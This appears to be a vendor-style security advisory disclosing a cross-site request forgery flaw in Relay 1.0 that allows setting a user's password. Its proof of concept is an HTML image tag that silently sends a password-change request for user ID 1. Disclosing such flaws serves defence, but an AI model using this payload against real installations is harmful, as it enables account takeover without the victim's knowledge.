Home
Consulting
Advisories
Software
Articles
Contact

Relay 1.0 Cross-site Request Forgery

Legacy Advisories

Description

A cross-site request forgery vulnerability in Relay 1.0 can be exploited to create a user's password.

Proof Of Concept

<html>
    <body>
        <img src="http://localhost/relay/management/index.php?page=manage&module=users&action=newPassword&uid=1&pass=Password1&passconf=Password1" />
    </body>
</html>


Copyright © 2018 AutoSec Tools LLC